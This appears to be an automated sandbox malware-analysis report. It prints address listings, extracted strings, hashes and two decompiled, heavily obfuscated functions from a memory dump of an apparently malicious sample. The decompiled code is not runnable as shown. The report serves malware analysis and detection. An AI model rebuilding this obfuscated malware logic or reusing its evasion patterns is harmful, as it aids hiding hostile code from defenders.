0x0472707f
0x04727087
0x0472708f
0x04727097
0x0472709f
0x047270ab
0x047270b2
0x047270b6
0x047270be
0x047270c9
0x047270d4
0x047270df
0x047270e7
0x047270ef
0x047270f7
0x047270ff
0x04727107
0x0472710f
0x04727114
0x0472711c
0x04727124
0x0472712c
0x04727134
0x04727139
0x04727141
0x04727141
0x04727141
0x04727146
0x04727146
0x04727146
0x04727146
0x04727148
0x00000000
0x00000000
0x0472714e
0x04727302
0x04727307
0x0472730a
0x04727141
0x04727141
0x04727141
0x00000000
0x04727141
0x04727154
0x0472715a
0x04727295
0x0472729e
0x047272a1
0x047272a4
0x047272a7
0x047272ac
0x047272b1
0x047272b1
0x047272bc
0x0472746f
0x047272c2
0x047272c2
0x04727141
0x04727141
0x04727141
0x00000000
0x04727141
0x04727141
0x04727160
0x04727166
0x04727270
0x04727275
0x0472727a
0x0472727e
0x04727283
0x04727283
0x0472728b
0x04727141
0x04727141
0x04727141
0x00000000
0x04727141
0x0472716c
0x04727172
0x04727221
0x04727231
0x04727223
0x04727223
0x04727223
0x04727236
0x0472723f
0x04727244
0x00000000
0x04727178
0x0472717e
0x00000000
0x04727184
0x047271ea
0x047271ef
0x047271f4
0x04727200
0x04727205
0x04727205
0x04727141
0x04727141
0x04727141
0x00000000
0x04727141
0x047271f6
0x047271f6
0x04727141
0x04727141
0x04727141
0x00000000
0x04727141
0x04727141
0x047271f4
0x0472717e
0x04727172
0x04727166
0x0472715a
0x04727475
0x0472747e
0x0472747e
0x0472731a
0x04727412
0x0472742d
0x04727432
0x04727435
0x0472743c
0x04727443
0x04727448
0x0472744f
0x00000000
0x04727320
0x04727326
0x047273fe
0x04727403
0x00000000
0x0472732c
0x04727332
0x047273ca
0x047273cf
0x047273d4
0x047273da
0x00000000
0x047273da
0x04727334
0x0472733a
0x0472735a
0x04727377
0x04727399
0x0472739e
0x047273a1
0x04727456
0x04727456
0x04727456
0x00000000
0x0472733a
0x04727332
0x04727326
0x00000000
0x0472745b
0x0472745b
0x00000000
0x04727467

Strings

|`d, xrefs: 04727067
^ooV, xrefs: 04726BCD
3T, xrefs: 04726CC6
S, xrefs: 047270BE
-{, xrefs: 04726ECE
wy, xrefs: 04726F45
P!, xrefs: 04727107
t7, xrefs: 0472732C
2p, xrefs: 04726C7F
t7, xrefs: 04727443

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: -{$2p$3T$P!$S$^ooV$t7$t7$wy$|`d
API String ID: 0-3906052420
Opcode ID: 7351a7c191284bae5bc47fe577c39f964edf104ea6789ad572dd5209ce120307
Instruction ID: f2a85f25600b65e0d980ec267f9213ff93de44fe0c4cdc7934cc8345b22385e2
Opcode Fuzzy Hash: 7351a7c191284bae5bc47fe577c39f964edf104ea6789ad572dd5209ce120307
Instruction Fuzzy Hash: AC222071608380DFD368CF25C689A9BBBF1FBC4708F10891DE68A96261D7B59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 047299D7, Relevance: 12.9, Strings: 10, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E047299D7() {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr* _v1564;
				intOrPtr* _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				intOrPtr* _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				intOrPtr* _t463;
				void* _t465;
				intOrPtr* _t475;
				void* _t478;
				void* _t513;
				signed int _t522;
				intOrPtr _t523;
				intOrPtr* _t525;
				signed int* _t539;
				void* _t542;

				_t539 =  &_v1768;
				_v1572 = 0xdb8779;
				_t478 = 0xc2a5d69;
				_v1568 = 0;
				_v1564 = 0;
				_v1664 = 0x3c30a6;
				_v1664 = _v1664 ^ 0xf675b5f8;
				_push(0x16);
				_v1592 = 0;
				_push(0x51);
				_v1664 = _v1664 / 0;
				_v1664 = _v1664 ^ 0x0b31e30e;
				_v1672 = 0x28af6a;
				_v1672 = _v1672 << 0xe;
				_push(0x1e);
				_v1672 = _v1672 / 0;
				_v1672 = _v1672 ^ 0x00859977;
				_v1660 = 0x5f7e9d;
				_v1660 = _v1660 + 0xffff0331;
				_v1660 = _v1660 ^ 0x3906dc01;
				_v1660 = _v1660 ^ 0x39585dcd;
				_v1584 = 0x6343e4;
				_v1584 = _v1584 ^ 0x0335d72b;
				_v1584 = _v1584 ^ 0x035694cd;
				_v1652 = 0x9b854e;
				_push(0x30);
				_v1652 = _v1652 / 0;
				_push(0xd);
				_v1652 = _v1652 * 0x24;
				_v1652 = _v1652 ^ 0x00ba9ff0;
				_v1736 = 0x6500e4;
				_v1736 = _v1736 >> 0xc;
				_v1736 = _v1736 + 0xfffff857;
				_v1736 = _v1736 / 0;
				_v1736 = _v1736 ^ 0x0555555e;
				_v1648 = 0x9fca58;
				_v1648 = _v1648 + 0xffffd422;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0xe79350e0;
				_v1656 = 0x31e388;
				_v1656 = _v1656 >> 0xd;
				_v1656 = _v1656 ^ 0x54f91bd8;
				_v1656 = _v1656 ^ 0x54f86158;
				_v1732 = 0x7c33d4;
				_v1732 = _v1732 << 9;
				_v1732 = _v1732 >> 7;
				_v1732 = _v1732 + 0xffff50b0;
				_v1732 = _v1732 ^ 0x01f27368;
				_v1740 = 0x7d115a;
				_v1740 = _v1740 + 0xfc3c;
				_v1740 = _v1740 / 0;
				_v1740 = _v1740 | 0x1b2c562e;
				_v1740 = _v1740 ^ 0x1b2e1045;
				_v1612 = 0x11da70;
				_v1612 = _v1612 + 0xffffecd8;
				_v1612 = _v1612 ^ 0x0014c599;
				_v1720 = 0x7fe2b6;
				_v1720 = _v1720 | 0x3c913d64;
				_v1720 = _v1720 >> 2;
				_v1720 = _v1720 ^ 0x0f3046fc;
				_v1724 = 0xe6c568;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 + 0xd093;
				_v1724 = _v1724 ^ 0x736cce29;
				_v1580 = 0x63dde6;
				_v1580 = _v1580 + 0xffff20d4;
				_v1580 = _v1580 ^ 0x0069b91d;
				_v1704 = 0x46ced3;
				_v1704 = _v1704 + 0xb0c1;
				_push(0x1b);
				_push(0x2e);
				_v1704 = _v1704 * 0x57;
				_v1704 = _v1704 ^ 0x18465802;
				_v1604 = 0xaef2b9;
				_v1604 = _v1604 << 9;
				_v1604 = _v1604 ^ 0x5de7492e;
				_v1768 = 0xbd1fd9;
				_v1768 = _v1768 << 0xe;
				_v1768 = _v1768 << 6;
				_v1768 = _v1768 * 0x5f;
				_v1768 = _v1768 ^ 0x187cde32;
				_v1576 = 0xcc2e48;
				_v1576 = _v1576 >> 0xe;
				_v1576 = _v1576 ^ 0x00025431;
				_v1712 = 0xe8ed8d;
				_v1712 = _v1712 << 0xa;
				_v1712 = _v1712 << 6;
				_v1712 = _v1712 ^ 0xed87295a;
				_v1688 = 0x13c698;
				_v1688 = _v1688 / 0;
				_v1688 = _v1688 << 2;
				_v1688 = _v1688 ^ 0x000ad82d;
				_v1764 = 0x72f02b;
				_v1764 = _v1764 << 0xb;
				_v1764 = _v1764 >> 0xd;
				_v1764 = _v1764 << 8;
				_v1764 = _v1764 ^ 0x04bf737e;
				_v1696 = 0x7e19c0;
				_v1696 = _v1696 >> 0x10;
				_v1696 = _v1696 | 0xc92329b4;
				_v1696 = _v1696 ^ 0xc925334b;
				_v1748 = 0xebbdff;
				_v1748 = _v1748 + 0xffff82b4;
				_v1748 = _v1748 >> 0x10;
				_v1748 = _v1748 >> 7;
				_v1748 = _v1748 ^ 0x0004c963;
				_v1756 = 0xb06cb6;
				_v1756 = _v1756 | 0xb03eb309;
				_v1756 = _v1756 + 0x94df;
				_v1756 = _v1756 / 0;
				_v1756 = _v1756 ^ 0x03d224e3;
				_v1632 = 0x9094ac;
				_v1632 = _v1632 + 0x35ec;
				_v1632 = _v1632 ^ 0x0092e624;
				_v1588 = 0x5457df;
				_v1588 = _v1588 + 0xffff0fc6;
				_v1588 = _v1588 ^ 0x0053ffd2;
				_v1668 = 0x7beb25;
				_v1668 = _v1668 + 0x1381;
				_v1668 = _v1668 >> 5;
				_v1668 = _v1668 ^ 0x000a61bf;
				_v1620 = 0xce7991;
				_v1620 = _v1620 << 0xd;
				_v1620 = _v1620 ^ 0xcf3f2522;
				_v1752 = 0xdf6f34;
				_v1752 = _v1752 << 8;
				_v1752 = _v1752 + 0xc825;
				_v1752 = _v1752 ^ 0xf2261dd5;
				_v1752 = _v1752 ^ 0x2d4153f8;
				_v1692 = 0x57861d;
				_v1692 = _v1692 ^ 0x2f465d87;
				_v1692 = _v1692 << 0xa;
				_v1692 = _v1692 ^ 0x47630b11;
				_v1628 = 0x314803;
				_v1628 = _v1628 + 0x222b;
				_v1628 = _v1628 ^ 0x0032ce7c;
				_v1744 = 0x572dc6;
				_t522 = 0x7c;
				_push(0x19);
				_v1744 = _v1744 * 0x59;
				_v1744 = _v1744 ^ 0x12ee94ea;
				_v1744 = _v1744 << 0xe;
				_v1744 = _v1744 ^ 0x1f419fc6;
				_v1596 = 0xfff9ca;
				_v1596 = _v1596 + 0x28ee;
				_v1596 = _v1596 ^ 0x0108a7a9;
				_v1760 = 0xc6a9b3;
				_v1760 = _v1760 + 0xffffdba3;
				_v1760 = _v1760 + 0xffff8c89;
				_push(5);
				_v1760 = _v1760 * 0x1a;
				_v1760 = _v1760 ^ 0x1413bd5d;
				_v1636 = 0xf66d63;
				_v1636 = _v1636 >> 6;
				_v1636 = _v1636 ^ 0x00099441;
				_v1700 = 0xf12589;
				_v1700 = _v1700 / _t522;
				_v1700 = _v1700 << 4;
				_v1700 = _v1700 ^ 0x00180be8;
				_v1676 = 0x42cf58;
				_v1676 = _v1676 * 0x53;
				_v1676 = _v1676 / 0;
				_v1676 = _v1676 ^ 0x00d94fd4;
				_v1708 = 0x360f3;
				_v1708 = _v1708 << 7;
				_v1708 = _v1708 ^ 0xff5af069;
				_v1708 = _v1708 ^ 0xfeeb64f6;
				_v1640 = 0xdd500e;
				_v1640 = _v1640 / _t522;
				_v1640 = _v1640 ^ 0x00016b32;
				_v1728 = 0x3b7551;
				_v1728 = _v1728 + 0x23cc;
				_v1728 = _v1728 / 0;
				_v1728 = _v1728 ^ 0x000553d9;
				_v1716 = 0x98eb83;
				_v1716 = _v1716 + 0xffff65cd;
				_v1716 = _v1716 + 0xe980;
				_v1716 = _v1716 ^ 0x009986fb;
				_v1644 = 0x1a3994;
				_v1644 = _v1644 + 0xffff1684;
				_v1644 = _v1644 ^ 0x00175224;
				_v1684 = 0x83ff2e;
				_v1684 = _v1684 >> 4;
				_v1684 = _v1684 ^ 0xcf12e1d8;
				_v1684 = _v1684 ^ 0xcf19de0f;
				_v1680 = 0xddba3;
				_v1680 = _v1680 >> 5;
				_v1680 = _v1680 * 0x69;
				_v1680 = _v1680 ^ 0x0027c9ab;
				_t477 = _v1592;
				_t538 = _v1592;
				_t523 = _v1592;
				_v1600 = 0x9db4ef;
				_v1600 = _v1600 + 0xffff4246;
				_v1600 = _v1600 ^ 0x0099bb9c;
				_v1608 = 0xb5073e;
				_v1608 = _v1608 << 5;
				_v1608 = _v1608 ^ 0x16af5f89;
				_v1616 = 0x73e993;
				_v1616 = _v1616 + 0xffff2e03;
				_v1616 = _v1616 ^ 0x00704629;
				_v1624 = 0x6b984e;
				_v1624 = _v1624 + 0xffff1d31;
				_v1624 = _v1624 ^ 0x006e73d6;
				while(1) {
					L1:
					while(1) {
						_t513 = 0x5c;
						do {
							while(1) {
								L3:
								_t542 = _t478 - 0x8235d35;
								if(_t542 > 0) {
									break;
								}
								if(_t542 == 0) {
									E04736349(_t538, _t477, _v1640, _v1728);
									_t478 = 0x6ba6982;
									while(1) {
										_t513 = 0x5c;
										goto L3;
									}
								} else {
									if(_t478 == 0x392474) {
										_t525 =  *0x47461fc + 0x234;
										while(1) {
											__eflags =  *_t525 - _t513;
											if(__eflags == 0) {
												break;
											}
											_t525 = _t525 + 2;
											__eflags = _t525;
										}
										_t523 = _t525 + 2;
										_t478 = 0xf488175;
										continue;
									} else {
										if(_t478 == 0x193a9df) {
											_push(0x4721488);
											_push(_v1724);
											_t465 = E04737AF5(_v1612, _v1720, __eflags);
											E04727A51( &_v1560, __eflags);
											E04736DA3(_v1580,  &_v1560,  *0x47461fc + 0x234, _v1704,  &_v520, _v1604, _t465,  &_v1040, 0x104, _v1768, _v1576, _v1712);
											E047263E1(_v1688, _t465, _v1764, _v1696);
											_t539 =  &(_t539[0xf]);
											_t478 = 0x392474;
											goto L1;
										} else {
											if(_t478 == 0x57ec5f2) {
												_t475 = E047372F8(_v1588, _v1668, _v1620, _v1752, _v1692, _t523, _t478, _v1584, _v1628, _v1744, _v1596, _t478, _t523, _t478, _v1660, _v1760,  &_v1040, _t478, _v1636, _v1736, _v1700, _v1676, _v1708, _v1652, _t478, _t477);
												_t538 = _t475;
												_t539 =  &(_t539[0x18]);
												__eflags = _t475;
												if(__eflags == 0) {
													goto L10;
												} else {
													_t478 = 0x8235d35;
													_v1592 = 1;
													while(1) {
														_t513 = 0x5c;
														goto L3;
													}
												}
											} else {
												if(_t478 != 0x6ba6982) {
													goto L25;
												} else {
													E04726274(_v1716, _t538, _v1644, _v1684, _v1680);
													_t539 =  &(_t539[3]);
													L10:
													_t478 = 0xe9f66d0;
													while(1) {
														_t513 = 0x5c;
														goto L3;
													}
												}
											}
										}
									}
								}
								L28:
								return _v1592;
							}
							__eflags = _t478 - 0xc2a5d69;
							if(_t478 == 0xc2a5d69) {
								_push(_t478);
								_push(_t478);
								E0473D7ED(_v1648, _v1656, _v1732,  &_v520, _t478, _v1664, _v1740);
								_t539 =  &(_t539[7]);
								_t478 = 0x193a9df;
								_t513 = 0x5c;
								goto L25;
							} else {
								__eflags = _t478 - 0xe9f66d0;
								if(_t478 == 0xe9f66d0) {
									E04726274(_v1600, _t477, _v1608, _v1616, _v1624);
								} else {
									__eflags = _t478 - 0xf488175;
									if(_t478 != 0xf488175) {
										goto L25;
									} else {
										_t463 = E04735BBD(_v1672, _v1748, _t478, _v1756, _v1632);
										_t477 = _t463;
										_t539 =  &(_t539[4]);
										__eflags = _t463;
										if(__eflags != 0) {
											_t478 = 0x57ec5f2;
											_t513 = 0x5c;
											goto L3;
										}
									}
								}
							}
							goto L28;
							L25:
							__eflags = _t478 - 0x2a3000a;
						} while (__eflags != 0);
						goto L28;
					}
				}
			}

0x047299d7
0x047299dd
0x047299ef
0x047299f4
0x047299fb
0x04729a02
0x04729a0a
0x04729a17
0x04729a19
0x04729a23
0x04729a25
0x04729a2b
0x04729a33
0x04729a3b
0x04729a47
0x04729a49
0x04729a4f
0x04729a57
0x04729a62
0x04729a6d
0x04729a78
0x04729a83
0x04729a8e
0x04729a99
0x04729aa4
0x04729ab9
0x04729abb
0x04729acd
0x04729acf
0x04729ad6
0x04729ae1
0x04729ae9
0x04729aee
0x04729afe
0x04729b02
0x04729b0a
0x04729b15
0x04729b20
0x04729b28
0x04729b33
0x04729b3e
0x04729b46
0x04729b51
0x04729b5c
0x04729b64
0x04729b69
0x04729b6e
0x04729b76
0x04729b7e
0x04729b86
0x04729b95
0x04729b99
0x04729ba1
0x04729ba9
0x04729bb4
0x04729bbf
0x04729bca
0x04729bd4
0x04729bdc
0x04729be1
0x04729be9
0x04729bf1
0x04729bf6
0x04729bfe
0x04729c06
0x04729c11
0x04729c1c
0x04729c27
0x04729c2f
0x04729c3c
0x04729c3f
0x04729c41
0x04729c45
0x04729c4d
0x04729c58
0x04729c60
0x04729c6b
0x04729c73
0x04729c78
0x04729c82
0x04729c86
0x04729c8e
0x04729c99
0x04729ca1
0x04729cac
0x04729cb4
0x04729cb9
0x04729cbe
0x04729cc6
0x04729cd6
0x04729cda
0x04729cdf
0x04729ce7
0x04729cef
0x04729cf4
0x04729cf9
0x04729cfe
0x04729d06
0x04729d0e
0x04729d13
0x04729d1b
0x04729d23
0x04729d2b
0x04729d33
0x04729d38
0x04729d3d
0x04729d45
0x04729d4d
0x04729d55
0x04729d64
0x04729d68
0x04729d70
0x04729d7b
0x04729d86
0x04729d91
0x04729d9c
0x04729da7
0x04729db2
0x04729dba
0x04729dc2
0x04729dc7
0x04729dcf
0x04729dda
0x04729de2
0x04729ded
0x04729df5
0x04729dfa
0x04729e02
0x04729e0c
0x04729e14
0x04729e1c
0x04729e24
0x04729e29
0x04729e31
0x04729e3c
0x04729e47
0x04729e52
0x04729e61
0x04729e62
0x04729e65
0x04729e69
0x04729e71
0x04729e76
0x04729e7e
0x04729e89
0x04729e94
0x04729e9f
0x04729ea7
0x04729eaf
0x04729ebc
0x04729ebe
0x04729ec2
0x04729eca
0x04729ed5
0x04729edd
0x04729ee8
0x04729ef8
0x04729efc
0x04729f01
0x04729f09
0x04729f16
0x04729f22
0x04729f26
0x04729f2e
0x04729f36
0x04729f3b
0x04729f43
0x04729f4b
0x04729f61
0x04729f68
0x04729f73
0x04729f7b
0x04729f8a
0x04729f8e
0x04729f96
0x04729f9e
0x04729fa6
0x04729fae
0x04729fb6
0x04729fc1
0x04729fcc
0x04729fd7
0x04729fdf
0x04729fe4
0x04729fec
0x04729ff4
0x04729ffc
0x0472a006
0x0472a00a
0x0472a012
0x0472a019
0x0472a020
0x0472a027
0x0472a032
0x0472a03d
0x0472a048
0x0472a053
0x0472a05b
0x0472a066
0x0472a071
0x0472a07c
0x0472a087
0x0472a092
0x0472a09d
0x0472a0a8
0x0472a0a8
0x0472a0ad
0x0472a0af
0x0472a0b0
0x0472a0b0
0x0472a0b0
0x0472a0b0
0x0472a0b2
0x00000000
0x00000000
0x0472a0b8
0x0472a278
0x0472a27f
0x0472a0ad
0x0472a0af
0x00000000
0x0472a0af
0x0472a0be
0x0472a0c4
0x0472a24c
0x0472a257
0x0472a257
0x0472a25a
0x00000000
0x00000000
0x0472a254
0x0472a254
0x0472a254
0x0472a25c
0x0472a25f
0x00000000
0x0472a0ca
0x0472a0d0
0x0472a1a4
0x0472a1a9
0x0472a1b8
0x0472a1c6
0x0472a21b
0x0472a234
0x0472a239
0x0472a23c
0x00000000
0x0472a0d6
0x0472a0dc
0x0472a180
0x0472a185
0x0472a187
0x0472a18a
0x0472a18c
0x00000000
0x0472a192
0x0472a192
0x0472a194
0x0472a0ad
0x0472a0af
0x00000000
0x0472a0af
0x0472a0ad
0x0472a0de
0x0472a0e4
0x00000000
0x0472a0ea
0x0472a0ff
0x0472a104
0x0472a107
0x0472a107
0x0472a0ad
0x0472a0af
0x00000000
0x0472a0af
0x0472a0ad
0x0472a0e4
0x0472a0dc
0x0472a0d0
0x0472a0c4
0x0472a33c
0x0472a34d
0x0472a34d
0x0472a289
0x0472a28f
0x0472a2d0
0x0472a2d1
0x0472a2f8
0x0472a2fd
0x0472a300
0x0472a307
0x00000000
0x0472a291
0x0472a291
0x0472a297
0x0472a334
0x0472a299
0x0472a299
0x0472a29f
0x00000000
0x0472a2a1
0x0472a2b8
0x0472a2bd
0x0472a2bf
0x0472a2c2
0x0472a2c4
0x0472a2c6
0x0472a0af
0x00000000
0x0472a0af
0x0472a2c4
0x0472a29f
0x0472a297
0x00000000
0x0472a308
0x0472a308
0x0472a308
0x00000000
0x0472a314
0x0472a0ad

Strings

.I], xrefs: 04729C60
t$9, xrefs: 0472A23C
(, xrefs: 04729E89
5, xrefs: 04729D7B
Qu;, xrefs: 04729F73
Cc, xrefs: 04729A83
)Fp, xrefs: 0472A07C
%{, xrefs: 04729DB2
t$9, xrefs: 0472A0BE
+", xrefs: 04729E3C

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: %{$)Fp$+"$.I]$Qu;$t$9$t$9$($5$Cc
API String ID: 0-1350543250
Opcode ID: 65b62221b286050a41085f81efe4d658d77d97279d2fc52ccaf9579f717600dc
Instruction ID: ff7b0e21f0cfb1cc862d602d522a17dc9d3d8eb9f8a5aaa99ea9b4aca7c36a35
Opcode Fuzzy Hash: 65b62221b286050a41085f81efe4d658d77d97279d2fc52ccaf9579f717600dc
Instruction Fuzzy Hash: 2B22FFB15093809FD378CF25C989A9BBBE1FBC4758F10891DE2DA86260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0473B3B8, Relevance: 12.8, Strings: 10, Instructions: 269
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0473B3B8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _t283;
				void* _t306;
				void* _t317;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				intOrPtr _t349;
				signed int* _t352;

				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t283 = E0472DD01(0);
				_v80 = _t283;
				_t352 =  &(( &_v196)[9]);
				_v72 = _t283;
				_t349 = _t283;
				_v76 = 0x6fac7d;
				_v124 = 0x4a2863;
				_t317 = 0x1fdb3ac;
				_v124 = _v124 ^ 0xc73f8cd2;
				_v124 = _v124 | 0xa757e0ac;
				_v124 = _v124 ^ 0xe777e0bd;
				_v172 = 0xc858c3;
				_t342 = 0x57;
				_v172 = _v172 / _t342;
				_v172 = _v172 + 0xccd;
				_v172 = _v172 ^ 0x023e99f0;
				_v172 = _v172 ^ 0x023cc383;
				_v168 = 0x19b9f4;
				_t343 = 0x7d;
				_v168 = _v168 / _t343;
				_v168 = _v168 >> 0xa;
				_v168 = _v168 << 8;
				_v168 = _v168 ^ 0x00073cdb;
				_v108 = 0x413c6f;
				_t44 =  &_v108; // 0x413c6f
				_t344 = 0x76;
				_v108 =  *_t44 * 0x5c;
				_v108 = _v108 ^ 0x17770b08;
				_v176 = 0xc6b17d;
				_v176 = _v176 / _t344;
				_v176 = _v176 * 0x48;
				_v176 = _v176 << 1;
				_v176 = _v176 ^ 0x00f62022;
				_v164 = 0xc19381;
				_v164 = _v164 ^ 0xa54ef55e;
				_v164 = _v164 | 0xa375b018;
				_v164 = _v164 ^ 0x0b62cbd9;
				_v164 = _v164 ^ 0xac9f521a;
				_v144 = 0x230443;
				_v144 = _v144 ^ 0x61ec349a;
				_v144 = _v144 | 0x679ff789;
				_v144 = _v144 ^ 0x67d769d4;
				_v120 = 0xa18f0;
				_v120 = _v120 << 0xe;
				_v120 = _v120 + 0xb2fb;
				_v120 = _v120 ^ 0x86324d78;
				_v152 = 0x793236;
				_t85 =  &_v152; // 0x793236
				_v152 =  *_t85 * 0x3b;
				_v152 = _v152 >> 5;
				_v152 = _v152 ^ 0x00d10e04;
				_v136 = 0x423543;
				_v136 = _v136 | 0x713fb8f4;
				_v136 = _v136 >> 5;
				_v136 = _v136 ^ 0x03864bd1;
				_v128 = 0x581d5c;
				_t345 = 0xf;
				_v128 = _v128 * 0x33;
				_v128 = _v128 + 0xffff1c3f;
				_v128 = _v128 ^ 0x118a1502;
				_v188 = 0x93d780;
				_v188 = _v188 + 0x6129;
				_v188 = _v188 >> 0xc;
				_v188 = _v188 / _t345;
				_v188 = _v188 ^ 0x000b8f38;
				_v92 = 0x6a1106;
				_t346 = 0x39;
				_v92 = _v92 / _t346;
				_v92 = _v92 ^ 0x00028170;
				_v180 = 0xa112c8;
				_v180 = _v180 >> 1;
				_v180 = _v180 << 9;
				_v180 = _v180 ^ 0x5fb4f568;
				_v180 = _v180 ^ 0xfea957ba;
				_v88 = 0x74c98d;
				_t347 = 0x71;
				_v88 = _v88 / _t347;
				_v88 = _v88 ^ 0x00030511;
				_v132 = 0x4f74c1;
				_v132 = _v132 << 1;
				_v132 = _v132 + 0xef8;
				_v132 = _v132 ^ 0x00918e2e;
				_v140 = 0x7ab6c8;
				_v140 = _v140 * 0xb;
				_v140 = _v140 | 0x5ccef5c1;
				_v140 = _v140 ^ 0x5dcd2f75;
				_v100 = 0xa0ecc;
				_v100 = _v100 * 0x14;
				_v100 = _v100 ^ 0x00c7ef96;
				_v148 = 0x316420;
				_v148 = _v148 << 0xf;
				_v148 = _v148 + 0x54e4;
				_v148 = _v148 ^ 0xb216b719;
				_v84 = 0x2d004b;
				_v84 = _v84 * 0x5f;
				_v84 = _v84 ^ 0x10b072b1;
				_v112 = 0x48fdd3;
				_v112 = _v112 | 0x32764ed1;
				_v112 = _v112 ^ 0x32748455;
				_v156 = 0xbecefd;
				_v156 = _v156 + 0x2bd1;
				_v156 = _v156 * 0x72;
				_v156 = _v156 ^ 0x550286b7;
				_v184 = 0x4ba10f;
				_v184 = _v184 + 0xffffa419;
				_v184 = _v184 << 8;
				_v184 = _v184 + 0xfc4e;
				_v184 = _v184 ^ 0x4b4ca0d0;
				_v192 = 0x883cdf;
				_v192 = _v192 + 0xa915;
				_v192 = _v192 << 0x10;
				_v192 = _v192 | 0xc43bb775;
				_v192 = _v192 ^ 0xe5fd0260;
				_v196 = 0x3b1061;
				_v196 = _v196 + 0x9573;
				_v196 = _v196 ^ 0x5d1d1e2b;
				_v196 = _v196 + 0xffff0ead;
				_v196 = _v196 ^ 0x5d2b1c09;
				_v96 = 0x5dbba3;
				_v96 = _v96 + 0xffffd9ae;
				_v96 = _v96 ^ 0x005c6132;
				_v116 = 0xa50c70;
				_v116 = _v116 ^ 0x09959bf6;
				_v116 = _v116 + 0xffff0b11;
				_v116 = _v116 ^ 0x092132fb;
				_v104 = 0xf8ba72;
				_v104 = _v104 + 0x8e91;
				_v104 = _v104 ^ 0x00fefd24;
				_v160 = 0xd68bf;
				_v160 = _v160 | 0x9f32ead9;
				_v160 = _v160 + 0xffff120f;
				_v160 = _v160 | 0x17e5f80e;
				_v160 = _v160 ^ 0x9ff57e17;
				do {
					while(_t317 != 0x1fdb3ac) {
						if(_t317 == 0x3347b56) {
							E047265A1(_v96, _v116, _v104, _v160, _v80);
						} else {
							if(_t317 == 0x9a98a2b) {
								_t306 = E04736CE6( &_v80, _v168, _t317, _a8, _v108, _v176);
								_t352 =  &(_t352[4]);
								__eflags = _t306;
								if(_t306 != 0) {
									_t317 = 0xb893220;
									continue;
								}
							} else {
								_t359 = _t317 - 0xb893220;
								if(_t317 != 0xb893220) {
									goto L9;
								} else {
									E0472E545(_v164, _v144, _v120, 0x44, _v152,  &_v68);
									_push(0x4721178);
									_push(_v188);
									_t321 = _v136;
									_v68 = 0x44;
									_v60 = E04737AF5(_v136, _v128, _t359);
									_t349 = E047274A1(_a24, _v92, _v180, _v88, _v136,  &_v68, _v172 | _v124, _t321, _v132, _a20, _t321, _v140, _v80, _v100, _v148, _v84, _a8, _t321, _v112, _v156, 0);
									E047263E1(_v184, _v60, _v192, _v196);
									_t352 =  &(_t352[0x1b]);
									_t317 = 0x3347b56;
									continue;
								}
							}
						}
						L12:
						return _t349;
					}
					_t317 = 0x9a98a2b;
					L9:
					__eflags = _t317 - 0xe58b5d4;
				} while (_t317 != 0xe58b5d4);
				goto L12;
			}

0x0473b3c2
0x0473b3cb
0x0473b3d2
0x0473b3d9
0x0473b3e0
0x0473b3e1
0x0473b3e8
0x0473b3ef
0x0473b3f0
0x0473b3f1
0x0473b3f6
0x0473b3fd
0x0473b400
0x0473b407
0x0473b409
0x0473b416
0x0473b41e
0x0473b423
0x0473b42b
0x0473b433
0x0473b43b
0x0473b449
0x0473b44e
0x0473b454
0x0473b45c
0x0473b464
0x0473b46c
0x0473b478
0x0473b47d
0x0473b483
0x0473b488
0x0473b48d
0x0473b495
0x0473b49d
0x0473b4a2
0x0473b4a3
0x0473b4a7
0x0473b4af
0x0473b4bd
0x0473b4c6
0x0473b4ca
0x0473b4ce
0x0473b4d6
